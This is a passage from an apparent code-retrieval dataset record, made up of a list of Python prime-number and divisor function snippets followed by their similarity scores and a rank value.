List[bool]:\r\n is_prime = [True] * (n + 1)\r\n is_prime[0] = is_prime[1] = False\r\n\r\n for i in range(2, int(math.sqrt(n)+1)):\r\n if is_prime[i]:\r\n for j in range(i*2, n+1, i):\r\n is_prime[j] = False\r\n return is_prime", "def primesfrom2to(n):\n sieve = numpy.ones(n//3 + (n%6 == 2), dtype=numpy.bool)\n for i in range(1, int(n**0.5)//3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[k*k//3::2*k] = False\n sieve[k*(k-2*(i&1)+4)//3::2*k] = False\n return numpy.r_[2,3,((3*numpy.nonzero(sieve)[0][1:]+1)|1)]", "def proper_divisors(n):\r\n numbers = []\r\n for i in xrange(1, n):\r\n if n % i == 0:\r\n numbers.append(i)\r\n \r\n return numbers", "def prime_numbers(upto):\n sieve = BitArray(upto + 1, 1)\n for number in xrange(2, upto + 1):\n 
if not sieve[number]:\n continue\n yield number\n for multiple in xrange(number ** 2, upto + 1, number):\n sieve[multiple] = 0\n return", "def primes():\n yield 2\n candidate = 3\n while True:\n for i in range(3, int(sqrt(candidate)) + 1, 2):\n if (candidate % i) == 0:\n break\n else:\n yield candidate\n candidate += 2", "def primes():\n yield 2\n candidate = 3\n while True:\n for i in range(3, int(sqrt(candidate)) + 1, 2):\n if (candidate % i) == 0:\n break\n else:\n yield candidate\n candidate += 2", "def n_primes(n):\n primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59,\n 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127,\n 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193,\n 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269,\n 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349,\n 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431,\n 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503,\n 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599,\n 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673,\n 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761,\n 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857,\n 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947,\n 953, 967, 971, 977, 983, 991, 997][:n]\n\n if len(primes) < n:\n big_number = 2000\n while 'Not enough primes':\n primes = primes_from_2_to(big_number)[:n]\n if len(primes) == n:\n break\n big_number += 1000\n\n return primes", "def sieve_of_eratosthenes(n):\n res = [2]\n i = 3\n marked = set()\n while i <= n**.5:\n if i not in marked:\n res.append(i)\n j = 0\n while j <= n/i:\n marked.add(i + j*i)\n j += 1\n i += 2\n while i <= n:\n if i not in marked:\n res.append(i)\n i += 2\n return res", "def evansPrimes(n):\n assert n>1\n primes = []\n for i in range(1,n+1):\n sums = 0\n for j in range(1,i):\n sums += evansMod(i,j)*j\n if sums == 1:\n primes.append(i)\n #print(primes) #for testing only\n return primes", "def sieve(n):\n if n < 2:\n return []\n s = [True] * (n + 1)\n s[0], s[1] = False, False\n sq = int(n ** 0.5)\n for i in range(2, sq + 1):\n if s[i]:\n m = n // i - i\n s[i * i : n + 1 : i] = [False] * (m + 1)\n return [i for i in range(n + 1) if s[i]]", "def sieve_of_eratosthenes(n):\n primes = [True] * (n + 1)\n # because p is the smallest prime\n p = 2\n\n while p * p <= n:\n # if p is not marked as False, it is a prime\n if primes[p]:\n # mark all the multiples of number as False\n for i in range(p * 2, n + 1, p):\n primes[i] = False\n p += 1\n\n # getting all primes\n primes = [element for element in range(2, n + 1) if primes[element]]\n\n return primes", "def calculate_prime_numbers(max_number: int) -> list[int]:\n\n is_prime = [True] * max_number\n for i in range(2, isqrt(max_number - 1) + 1):\n if is_prime[i]:\n for j in range(i**2, max_number, i):\n is_prime[j] = False\n\n return [i for i in range(2, max_number) if is_prime[i]]", "def eratosthenes_sieve(n):\r\n\tnumbers = [True for i in range(n + 1)]\r\n\t\r\n\tp = 2\r\n\twhile (p**2 <= n):\r\n\t\tif numbers[p]:\r\n\t\t\tfor i in range(p**2, n + 1, p):\r\n\t\t\t\tnumbers[i] = False\r\n\t\tp += 1\r\n\t\t\r\n\tprimes = compress(range(2, n + 1),numbers[2:])\r\n\treturn list(primes)", "def primesfrom2to(n):\n sieve = numpy.ones(n/3 + (n%6==2), dtype=numpy.bool)\n for i in xrange(1,int(n**0.5)/3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ k*k/3 ::2*k] = False\n sieve[k*(k-2*(i&1)+4)/3::2*k] = False\n return 
numpy.r_[2,3,((3*numpy.nonzero(sieve)[0][1:]+1)|1)]", "def count_prime():\n nums = []\n for i in range(2, 10000):\n if is_prime(i):\n nums.append(i)\n return nums", "def primesfrom2to(n):\n sieve = np.ones(n//3 + (n%6==2), dtype=np.bool)\n sieve[0] = False\n for i in range(int(n**0.5)//3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ ((k*k)//3) ::2*k] = False\n sieve[(k*k+4*k-2*k*(i&1))//3::2*k] = False\n return np.r_[2,3,((3*np.nonzero(sieve)[0]+1)|1)]", "def prime_list(n):\n if n < 2:\n return []\n\n size = n//2\n prime_nums = []\n prime_nums.append(2)\n for i in range(1, size):\n val = i*2 + 1\n index = 0;\n for item in prime_nums:\n index+=1\n if val % item == 0:\n break\n if index == len(prime_nums):\n prime_nums.append(val)\n\n print(prime_nums)", "def prime_factorization(n):\n\t\n\tprimes = []\n\t\n\twhile not n % 2:\n\t\tprimes.append(2)\n\t\tn //= 2\n\t\n\tfor possible_factor in range(3, int(sqrt(n)) + 1, 2):\n\t\twhile not n % possible_factor:\n\t\t\tprimes.append(i)\n\t\t\tn //= possible_factor\n\t\n\tif n > 1:\n\t\tprimes.append(n)\n\treturn primes", "def divisors(n):\r\n numbers = []\r\n for i in xrange(1, n+1):\r\n if n % i == 0:\r\n numbers.append(i)\r\n return numbers", "def primes(lim):\n limsqrt = ceil(sqrt(lim))\n s = [ True ] * (lim + 1)\n for i in range(2, ceil(sqrt(lim))):\n if s[i]:\n k = 0\n while True:\n l = i * i + k * i\n if l > lim: break\n k += 1\n s[l] = False\n return [i for i in range(2, lim + 1) if s[i]]", "def sieve(n: int) -> Generator[int, None, None]:\n primes, p = [i for i in range(2, n + 1)], 2\n while p**2 < n:\n for i in primes:\n if i % p == 0 and i != p:\n primes.remove(i)\n p += 1\n yield from primes", "def return_prime_numbers_less_tahn_100():\r\n primes = []\r\n for num in range(100):\r\n is_prime = True\r\n for i in range(2, num):\r\n if num % i == 0:\r\n is_prime = False \r\n if is_prime:\r\n primes.append(num)\r\n return primes", "def primesfrom2to(n):\n sieve = np.ones(n//3 + (n%6==2), dtype=np.bool)\n for i in range(1,int(n**0.5)//3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ k*k//3 ::2*k] = False\n sieve[k*(k-2*(i&1)+4)//3::2*k] = False\n return np.r_[2,3,((3*np.nonzero(sieve)[0][1:]+1)|1)]", "def isprime(n=936):\n if n < 3: return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n\n def mr(n, _known_primes=[2, 3], _precision_for_huge_n=16, ):\n\n def _try_composite(a, d, n, s):\n if pow(a, d, n) == 1:\n return False\n for i in range(s):\n if pow(a, 2**i * d, n) == n-1:\n return False\n return True # n is definitely composite\n\n if n in _known_primes:\n return True\n if n in (0, 1):\n return False\n if any((n % p) == 0 for p in _known_primes):\n return False\n d, s = n - 1, 0\n while not d % 2:\n d, s = d >> 1, s + 1\n\n # Returns exact according to http://primes.utm.edu/prove/prove2_3.html\n if n < 1373653:\n return not any(_try_composite(a, d, n, s) for a in (2, 3))\n if n < 25326001:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))\n if n < 118670087467:\n if n == 3215031751:\n return False\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))\n if n < 2152302898747:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))\n if n < 3474749660383:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))\n if n < 341550071728321:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))\n # otherwise\n return not any(_try_composite(a, d, n, s)\n for a in _known_primes[:_precision_for_huge_n])\n\n def trial_division(n):\n 
if n < 2:\n return False\n if n < 4:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n limit = int(math.sqrt(n))\n divisor = 5\n\n while divisor <= limit:\n if n % divisor == 0 or n % (divisor + 2) == 0:\n return False\n divisor += 6\n\n return True\n\n if 30000000 < n < 341550071728321:\n return mr(n)\n else:\n return trial_division(n)", "def eratosthenes(n):\n assert n>1 #asserting n be a positive integer\n prime_list = []\n for i in range(2,n+1): #fills prime_list with all integers 2 <= i <= n\n prime_list.append(i)\n multiple = 2 #set to 2 because if set to 1 it will remove all elements from the list\n while multiple <= n/multiple:\n count = 2 #set to 2 because if set to 1 it will remove the prime itself from the list\n while count <= n/multiple:\n if count*multiple in prime_list: #checks if count*multiple is in list. needed because it could have already been removed\n prime_list.remove(count*multiple) #removes count*multiple\n count = count + 1\n multiple = multiple + 1\n #print(prime_list) #for testing only\n return prime_list", "def es_primo(n):\n \n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def nPrime(n):\n\n start = 1\n while n != 1:\n start += 2\n if isPrime(start):\n n -= 1\n # end of if\n\n return start", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 or n == 3:\n return True\n elif n % 2 == 0:\n return False\n else:\n x = 0\n for i in range(3, n, 2):\n if n % i == 0:\n x = 1\n return x == 0", "def primesfrom2to(n):\n sieve = np.ones(n/3 + (n%6==2), dtype=np.bool)\n for i in xrange(1,int(n**0.5)/3+1):\n if sieve[i]:\n k=3*i+1|1\n sieve[ k*k/3 ::2*k] = False\n sieve[k*(k-2*(i&1)+4)/3::2*k] = False\n return np.r_[2,3,((3*np.nonzero(sieve)[0][1:]+1)|1)]" ]
[ "0.8414769", "0.8174812", "0.8154782", "0.8066897", "0.79940116", "0.7972602", "0.7941718", "0.79004717", "0.78921247", "0.7884613", "0.786188", "0.786017", "0.7860028", "0.78575575", "0.78575575", "0.7856777", "0.78546125", "0.78280634", "0.78155655", "0.7812109", "0.7803009", "0.77565897", "0.77513456", "0.77464074", "0.7738278", "0.77119255", "0.7673776", "0.76488686", "0.7648139", "0.7602413", "0.7601451", "0.7598183", "0.7583401", "0.7580974", "0.75691336", "0.7560983", "0.7552433", "0.7549309", "0.7539303", "0.7537891", "0.75343764", "0.75117826", "0.7509301", "0.7507737", "0.75073373", "0.7505705", "0.7494353", "0.74655443", "0.7446996", "0.74435246", "0.7441924", "0.74392486", "0.743494", "0.7427068", "0.7410845", "0.7368076", "0.73645544", "0.736068", "0.7349784", "0.7342157", "0.73385906", "0.73306334", "0.7322606", "0.73201823", "0.73176986", "0.7315742", "0.73156565", "0.7313854", "0.7310673", "0.72992986", "0.72975814", "0.7296903", "0.72931737", "0.72889304", "0.728688", "0.728688", "0.72827727", "0.7280612", "0.72803736", "0.7278763", "0.7278484", "0.7277886", "0.72751695", "0.72626424", "0.7250519", "0.7249935", "0.7249776", "0.72410107", "0.72366047", "0.7236361", "0.723324", "0.7217727", "0.7209007", "0.720805", "0.7206141", "0.7200622", "0.7198249", "0.7185404", "0.7174863", "0.7167392" ]
0.77787405
21
Get all data spread across multiple pages
def _get_all_data(self, resource): response = self._get_raising('{}{}?per_page=100&page=1'.format( self.GH_API_ENDPOINT, resource )) yield from response.json() while 'next' in response.links: response = self._get_raising(response.links['next']['url']) yield from response.json()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _paginatedRequest(allPages, *args):\n data = []\n currentPage = 0\n while True:\n newData = Gw2Spidy._request(*(args + (str(currentPage),)))\n if not allPages:\n return newData['results']\n data.extend(newData['results'])\n currentPage = currentPage + 1\n if newData['page'] == newData['last_page']:\n break\n return data", "def get_data(self):\n has_next_page = True\n page = 1\n while has_next_page:\n print(f'Getting page {page}')\n response = self.get_articles(\n page=page,\n size=200,\n order_by='extracted_at',\n order_type='asc'\n )\n pagination = response.get('pagination')\n has_next_page = pagination.get('has_next')\n self.save_articles(response.get('articles'))\n page += 1\n time.sleep(2.5)", "def _get_pages(self,url,params,section):\n if self.verbose:\n print('Get Pages for {}'.format(url))\n print(params)\n page = 1\n maxPage = 1\n \n all_results = []\n this_batch = []\n while page <= maxPage: \n \n params['page']=page\n resp = self._get(url=url,params=params)\n maxPage = int(resp.headers.get('X-Total-Page-Count',0))\n try:\n results=resp.json()\n except:\n results=None\n if isinstance(results,(list,dict)):\n if 'errors' in results:\n print(results['errors'])\n return results\n \n this_batch = results[section]\n all_results.extend(this_batch)\n\n page+=1\n else:\n if self.verbose:\n print(\"PROBLEM\")\n return results\n\n return all_results", "def fetch_pages(query_val, page_num):\n \n for page_id in range(1 + page_num + 1):\n try:\n output = fetch_data(query_val, page_id)\n for j in output:\n print(str(j))\n \n except Exception as e:\n print(e)", "def page_data():\n return scrape()", "def get_paginate_data(self, *args, **kwargs):\n pass", "def _get_allpages(self, url:str, paramsdict:Dict[str,str]):\n r1 = self._get_dict_from_url(url, paramsdict)\n r = [r1]\n #display(r)\n if 'total_pages' in r1:\n # print('more than one page')\n for next_page in range(2, r1['total_pages']+1):\n # print(f\"load page {next_page} \")\n r.append(self._get_dict_from_url(url, {**paramsdict, 'page':next_page}))\n # print(len(r))\n # print([len(rx['results']) for rx in r])\n results = [entry for rx in r for entry in rx['results'] ]\n\n return results", "def by_page(self) -> global___Snippet.PaginatedResponseHandling.ByPage:", "def by_page(self) -> global___Snippet.PaginatedResponseHandling.ByPage:", "def get_json():\n data_list = []\n\n for page in range(1,13):\n url = BASE_URL + STYLE_URL + \"&\" + PAGINATION_URL + str(page)\n print(page, \"pages processed\")\n try:\n response = requests.get(url, timeout=METADATA_REQUEST_TIMEOUT)\n data = response.json()['Paintings']\n parse_data(data_list, data)\n except requests.exceptions.RequestException as e:\n print(e)\n sys.exit(1)\n\n return data_list", "def getAllListPage():\n firstPage = city + '/line1'\n data = urlopen(firstPage).read().decode('gbk')\n urlList = getLineTypeList(data)\n urlList.append(firstPage)\n num = len(urlList)\n i = 0\n p = Pool(processes=4)\n pageData = p.map(readData, urlList)\n# manager = Manager()\n# pageData = manager.list()\n# while i < num:\n# procline = Process(target=readData, args=(urlList[i], pageData,))\n# procline.start()\n# procline.join()\n# i += 1\n return pageData", "def get_top_100_data(self):\n self.driver.get(self.TOP_100_BOOKS_URL)\n\n cookies_button = self.driver.find_element_by_xpath(\"/html/body\")\n cookies_button.click()\n\n books_list = []\n\n print(\"Getting books data from page 1\")\n try:\n for page_numb in range(self.FIRST_PAGE_TO_CLICK, self.NMB_OF_PAGES+2):\n content = self.driver.page_source\n 
page_soup = BeautifulSoup(content, features='html.parser')\n books_list += self._get_books_from_page(page_soup)\n\n if page_numb == self.NMB_OF_PAGES+1:\n break\n self._load_page(page_numb)\n print(f\"Getting books data from page {page_numb}\")\n except:\n pass\n\n return books_list", "def get_all_pages(session, url, size, params=None):\n # Get first page to get results and detect number fo pages\n response = get_single_page(session, url, size, params)\n parameters = {}\n # Get number of indexes for this request\n entries = int(response.headers['X-Total'])\n # Calculate amount of pages that need to be requested\n pages = int(entries / size) + (entries % size > 1)\n # Data retrived by the request\n data = response.json()\n\n # Add params if custom parameters\n if params is not None:\n parameters.update(params)\n # Detect if more than 1 page\n if pages > 1:\n # Range between 2 and pages + 1 to get the last one as well\n for page in range(2, pages + 1):\n # Update parameters with page[number] parameter\n parameters.update({'page[number]': page})\n # Make the request\n r = get_single_page(session, url, size, params=parameters)\n try:\n # Merge data from request with already received data\n new_data = r.json()\n if new_data == '[]':\n continue\n data += new_data\n except json.JSONDecodeError:\n print('Error when decoding json, please try again...')\n exit(1)\n\n return data", "def get_page_data(table_name: str) -> List:\r\n page_data: List = []\r\n for page in range(1, 2):\r\n url: str = 'https://www.newegg.com/p/pl?d={}&page={}'.format(table_name, page)\r\n page_text = requests.get(url).content\r\n page_data.append(page_text)\r\n sleep(randint(3, 10))\r\n return page_data", "def load_data(page: int) -> DataResponse:\n assert page > 0\n items_per_page = 4\n # we number pages from 1, so remove 1 from it to start from beginning of the list\n data = database[(page-1)*items_per_page:page*items_per_page]\n return DataResponse(data=data)", "def data(self):\n previous_url = None\n page = int(self.request.GET.get('page', 1))\n next_url = self.request.resource_url(self, query={\"page\": page + 1})\n pagination = (page - 1) * self.page_size\n\n count = mongo['readable-api'].foo.count()\n\n if page > 1:\n previous_url = self.request.resource_url(\n self,\n query={\"page\": page - 1},\n )\n if (self.page_size * page) >= count:\n next_url = None\n\n results = [\n r for r in\n mongo['readable-api'].foo.find(\n limit=self.page_size,\n skip=pagination,\n )\n ]\n\n return {\n \"count\": count,\n \"next\": next_url,\n \"previous\": previous_url,\n \"results\": [\n {\n \"url\": self.request.resource_url(\n self.make_child(result['foo'])\n ),\n **result\n }\n for result in results\n ],\n \"schema\": self.schema,\n }", "def page_through(app_id, app_secret):\n has_next_page = True\n in_date_range = True\n \n #we only want to keep the articles that were returned from the NYtimes api, so this creates a list of target urls\n with open('output/article_search.json') as f:\n nyt_dat = json.load(f)\n nyt_urls = []\n for i in nyt_dat:\n nyt_urls.append(core_url(i['web_url']))\n\n items = get_page(app_id, app_secret)\n process_items(items, nyt_urls)\n\n while has_next_page & in_date_range:\n if 'paging' not in items.keys():\n has_next_page=False\n\n if items['data'][0]['created_time'][0:7]=='2016-10':\n in_date_range = False\n\n items = json.loads(request_until_succeed(items['paging']['next']))\n process_items(items, nyt_urls)", "def page_common_logic(fs, per_page, id=1):\n requested_record = Common.collection_creation(fs)\n 
pages = int(len(requested_record) / per_page)\n quot = int(len(requested_record) % per_page)\n if quot != 0:\n pages = pages + 1\n if id == 1:\n page_list = Common.index_list(0, pages)\n data_list = requested_record[0:per_page]\n else:\n page_list = Common.index_list(0, pages)\n data_list = requested_record[\n (per_page * (id - 1)) : (per_page * (id - 1)) + per_page\n ]\n return page_list, data_list", "def fetch_paginated_data(url):\n data = []\n while url:\n response = requests.get(url)\n response_json = response.json()\n data.extend(response_json[\"results\"])\n url = response_json[\"next\"]\n return data", "def paginated(self) -> global___Snippet.Paginated:", "def query(self, page) -> [str, dict]:", "def iterResponsePages(service, payload, verbose, slow_down):\n token = 0\n next_page = True\n data = {'reports': []}\n\n\n while next_page:\n if verbose:\n print(f'Fetching rows starting at position: {token}')\n if slow_down > 0:\n time.sleep(slow_down)\n \n data_tmp = service.reports().batchGet(body=payload).execute()\n token = data_tmp.get('reports')[0].get('nextPageToken')\n\n if token != None:\n payload.get('reportRequests')[0].update({'pageToken': token})\n else:\n next_page = False\n payload.get('reportRequests')[0].update({'pageToken': '0'})\n\n for report in data_tmp.get('reports'):\n data.get('reports').append(report)\n\n return data", "def __update_page_results(self):\n \n pages = []\n\n # Request id for pages associated to search term \n page_fields='page&fields=id,name,username,link'\n term = self.track[self.track_index]\n self.track_index += 1\n \n # Define url for http request to get pages id associated to search term \n page_request_url = 'https://graph.facebook.com/search?q=%s&type=%s&limit=%d&access_token=%s'%(term,page_fields,self.page_lim,self.access_token)\n \n while(True):\n # Try 100 times\n for i in range(100):\n \n page_response = requests.get(page_request_url)\n \n if 'error' in page_response.json() or page_response.status_code <> 200:\n print \"\\n !---- ERROR IN SEARCH REQUEST ----!\"\n print time.ctime()\n print \"Status Code: \", page_response.status_code\n print page_response.json()\n #raise StopIteration()\n time.sleep(1800) # Wait 30 minutes\n else:\n break\n \n page_json = page_response.json()\n pages = pages + page_json['data']\n time.sleep(5)\n \n if 'next' in page_json['paging']:\n page_request_url = page_json['paging']['next']\n else:\n break\n \n print \"Term: %s, Pages: %d\"%(term, len(pages))\n return pages", "def fetch_main_index(self):\n\n path = G_PATH1 % self.options['lastname']\n url = '%s://%s/%s' % (G_PROT, G_HOST, path)\n\n html_content = self.http_client.http_get(url)\n try:\n tree = html.fromstring(html_content)\n except: #Exception as e\n pass\n # @todo\n\n pages = []\n\n for link in tree.xpath('//td[@class=\"gt\"]/a'):\n\n ilosc = 0\n try:\n ilosc = int(link.text_content().strip())\n except Exception: # as e\n pass\n\n if ilosc > 0:\n url = link.values()[0]\n count = int(link.text_content().strip())\n\n rid_w = HttpClient.find_params_in_url(url)\n self.logger.info(u'%s %s %s', rid_w['w'], rid_w['rid'], str(count))\n\n area = {\n 'url': u'http://geneteka.genealodzy.pl/%s' % url,\n 'rid': rid_w['rid'],\n 'w': rid_w['w'],\n 'wid': rid_w['wid'],\n 'count': count,\n }\n pages.append(area)\n\n return pages", "def paginate_data(self, data, page):\n return data, {}", "def page(self):\r\n limit = self.get_limit()\r\n offset = self.get_offset()\r\n count = self.get_count()\r\n objects = self.get_slice(limit, offset)\r\n meta = {\r\n 'offset': 
offset,\r\n 'limit': limit,\r\n 'total_count': count}\r\n\r\n if limit:\r\n meta['previous'] = self.get_previous(limit, offset)\r\n meta['next'] = self.get_next(limit, offset, count)\r\n\r\n return {\r\n self.collection_name: objects, 'meta': meta}", "def get_data(authenticated_headers: dict, url: str, odata_filter: str = None, max_pages: int = None) -> dict:\n\n next_link_url = None\n\n if odata_filter:\n count_data = requests.get(url + '?$filter=' + odata_filter, headers=authenticated_headers, verify=False)\n\n if count_data.status_code == 400:\n print(\"Received an error while retrieving data from %s:\" % url + '?$filter=' + odata_filter)\n pprint(count_data.json()['error'])\n return {}\n\n count_data = count_data.json()\n if count_data['@odata.count'] <= 0:\n print(\"No results found!\")\n return {}\n else:\n count_data = requests.get(url, headers=authenticated_headers, verify=False).json()\n\n if 'value' in count_data:\n data = count_data['value']\n else:\n data = count_data\n\n if '@odata.nextLink' in count_data:\n # Grab the base URI\n next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + count_data['@odata.nextLink']\n\n i = 1\n while next_link_url is not None:\n # Break if we have reached the maximum number of pages to be returned\n if max_pages:\n if i >= max_pages:\n break\n else:\n i = i + 1\n response = requests.get(next_link_url, headers=authenticated_headers, verify=False)\n next_link_url = None\n if response.status_code == 200:\n requested_data = response.json()\n if requested_data['@odata.count'] <= 0:\n print(\"No results found!\")\n return {}\n\n # The @odata.nextLink key is only present in data if there are additional pages. We check for it and if it\n # is present we get a link to the page with the next set of results.\n if '@odata.nextLink' in requested_data:\n next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + \\\n requested_data['@odata.nextLink']\n\n if 'value' in requested_data:\n data += requested_data['value']\n else:\n data += requested_data\n else:\n print(\"Unknown error occurred. Received HTTP response code: \" + str(response.status_code) +\n \" with error: \" + response.text)\n raise Exception(\"Unknown error occurred. 
Received HTTP response code: \" + str(response.status_code)\n + \" with error: \" + response.text)\n\n return data", "def parallel_get_pages(args):\n n_requests, from_id, step, index_name, es = args\n all_sites_arr = []\n for _ in range(n_requests):\n waiting_response_time = 0\n for i in range(5):\n time.sleep(waiting_response_time)\n\n try:\n res = es.search(\n index=index_name,\n body={\n \"from\": from_id,\n \"query\": {\n \"match_all\": {}\n },\n \"size\": step,\n \"sort\": {\n \"site_id\": \"asc\"\n }\n },\n request_timeout=1000\n )\n print(\"Got %d Hits\" % len(res['hits']['hits']))\n\n for site in res['hits']['hits']:\n all_sites_arr.append({\n \"link\": site[\"_source\"][\"link\"],\n \"hyperlinks\": site[\"_source\"][\"hyperlinks\"]\n })\n\n break\n except TransportError as exc:\n print('index setup error', exc)\n\n waiting_response_time = math.exp(i + 1)\n\n from_id += step\n time.sleep(10)\n\n return all_sites_arr", "def get_page(self, page: int = 1, page_size: int = 10) -> List[List]:\n assert isinstance(page, int) and page > 0\n assert isinstance(page_size, int) and page_size > 0\n self.dataset()\n index_tuple: Tuple = index_range(page, page_size)\n start_index: int = index_tuple[0]\n end_index: int = index_tuple[1]\n return self.__dataset[start_index:end_index]", "def mor_prepare_data():\n prices, locations, areas, links = [], [], [], []\n for i in range(START_PAGE, SEARCHING_DEPTH+1):\n handler = requests.get(main_url, params={\"page\": str(i)})\n soup = bs4.BeautifulSoup(handler.text, 'lxml')\n heads = soup.find_all(\"header\")\n once = True\n for head in heads:\n if head.find(\"meta\", {\"itemprop\": \"category\"}) and once:\n\n raw_price = head.find(\"meta\", {\"itemprop\": \"price\"})\n price = int(float(raw_price[\"content\"]) if raw_price else \"\")\n\n raw_loc_list = head.find(\"h2\",\n {\"class\": \"single-result__title\"}).getText().strip().split(\n \", \")\n found = False\n for loc in raw_loc_list:\n if location_mapper[CITY].get(loc.lower(), 0):\n location = location_mapper[CITY][loc.lower()]\n\n found = True\n break\n if not found:\n location = \"\"\n if DEBUG_MODE:\n print(raw_loc_list)\n\n raw_area = head.find(\"p\", {\n \"class\": \"single-result__price single-result__price--currency\"}).getText().strip().split()\n if price and location:\n square_price = raw_area[0] if len(raw_area) == 2 else \"\".join(\n (raw_area[0], raw_area[1]))\n\n area = int(price / float(square_price.replace(\",\", \".\")))\n link_url = head.find('a')['href']\n\n if location and area and link_url:\n prices.append(price) if price < PRICE_UPPER_LIMIT else prices.append(\n PRICE_UPPER_LIMIT)\n locations.append(location)\n areas.append(area) if area < AREA_UPPER_LIMIT else areas.append(\n AREA_UPPER_LIMIT)\n links.append(link_url)\n\n return prices, locations, areas, links", "def get_series(self, page=0, filters=''):", "def results(self):\n page = []\n\n for i, item in enumerate(super(VideoCarouselTile, self).results()):\n page.append(item)\n if (i + 1) % 3 == 0:\n yield page\n page = []\n if page:\n yield page", "def test_get_multiple_pages_lro(client):\n from azure.mgmt.core.polling.arm_polling import ARMPolling\n poller = client.paging.begin_get_multiple_pages_lro(polling=ARMPolling(timeout=0, request_id=\"test\"))\n pager = poller.result()\n\n items = list(pager)\n\n assert len(items) == 10\n assert items[0][\"properties\"][\"id\"] == 1\n assert items[1][\"properties\"][\"id\"] == 2", "def iter_pages(self) -> Generator[Tuple[Optional[List[dict]], int], None, None]:\n # retrieves the data 
for the given url\n data_list, response, result = self.retrieve_data(self.url)\n\n if result != GithubApiResult.SUCCESS:\n self.logger.debug(\"Failed to retrieve the data even though 10 attempts were given\")\n yield None, None\n return\n\n # this retrieves the page for the given url\n page_number = get_url_page_number(self.url)\n\n # yields the first page of data and its page number\n yield data_list, page_number\n\n while 'next' in response.links.keys():\n\n # gets the next page from the last responses header\n next_page = response.links['next']['url']\n\n # Here we don't need to pass in params with the page, or the default params because the url from the headers already has those values\n data_list, response, result = self.retrieve_data(next_page)\n\n if result != GithubApiResult.SUCCESS:\n self.logger.debug(f\"Failed to retrieve the data for even though 10 attempts were given. Url: {next_page}\")\n return\n\n page_number = get_url_page_number(next_page)\n\n # if either the data or response is None then yield None and return\n if data_list is None or response is None:\n return\n\n # yield the data from the page and its number\n yield data_list, page_number", "def _get_assets_for_page(request, course_key, current_page, page_size, sort):\r\n start = current_page * page_size\r\n\r\n return contentstore().get_all_content_for_course(\r\n course_key, start=start, maxresults=page_size, sort=sort\r\n )", "def _fetch_items(self):\n url = self._api.router.publication['search'].format(\n project_id=self.project_id\n )\n res_data = self._api.post(url, data=self.search_param)\n self.total = res_data['total']\n self._items = (\n Publication(item, self.project_id)\n for item in res_data['hits']\n )\n div = self.total // self.search_param['limit']\n reste = self.total % self.search_param['limit']\n self.total_page = div\n if reste != 0: self.total_page += 1\n self.search_param = self.search_param.next_page()", "def page22(self):\n self.token_mid = \\\n '8'\n result = request2201.GET('/Cars_Sample_App/cars.do' +\n '?query=' +\n self.token_query +\n '&mid=' +\n self.token_mid)\n\n return result", "def read_all_pages(self, url):\n\n result = []\n next_token = ''\n token_param = '&startToken=' if '?' 
in url else '?startToken='\n\n while True:\n paginated_url = url + token_param + next_token\n response = self.http_client.get(paginated_url)\n if response.status_code != 200:\n raise BackendException(\"Pagination failed with status=%s on \"\n \"URL=%s\" % (response.status_code, url))\n\n parsed = response.json()\n if 'data' in parsed and len(parsed['data']) > 0:\n result.extend(parsed['data'])\n else:\n break\n\n # Do not make another HTTP request if everything is here already\n if len(result) >= parsed['count']:\n break\n\n if 'nextToken' not in parsed:\n break\n next_token = parsed['nextToken']\n\n return result", "def page9(self):\n result = request901.GET('/Cars_Sample_App/car.do' +\n '?query=' +\n self.token_query +\n '&cid=' +\n self.token_cid)\n\n return result", "def get_page(self, page: int = 1, page_size: int = 10) -> List[List]:\n assert isinstance(page, int) and page > 0\n assert isinstance(page_size, int) and page_size > 0\n\n range = index_range(page, page_size)\n self.dataset()\n return self.__dataset[range[0]: range[1]]", "def get_all(self, start_at, limit, order=None):", "def _get_objects_for_page(self, page_number):\n start, end = self._calculate_index(page_number, self.per_page, self.objects_count)\n return self._slice_objects(start, end)", "def page24(self):\n self.token_mid = \\\n '7'\n result = request2401.GET('/Cars_Sample_App/cars.do' +\n '?query=' +\n self.token_query +\n '&mid=' +\n self.token_mid)\n self.token_query = \\\n httpUtilities.valueFromBodyURI('query') # 'car'\n # 6 different values for token_cid found in response, using the first one.\n self.token_cid = \\\n httpUtilities.valueFromBodyURI('cid') # '20'\n\n return result", "def page8(self):\n result = request801.GET('/Cars_Sample_App/car.do' +\n '?query=' +\n self.token_query +\n '&cid=' +\n self.token_cid)\n self.token_carName = \\\n httpUtilities.valueFromBodyURI('carName') # 'S'\n self.token_query = \\\n httpUtilities.valueFromBodyURI('query') # 'carEnquiries'\n\n return result", "def retrieving_data():\n for x in range(1):\n page_number=random.randint(1,500)\n page_num=str(page_number)\n url = 'http://www.tastespotting.com/browse/'+page_num\n req = http.request('GET', url)\n data = BeautifulSoup(req.data,'html.parser')\n for each_div in 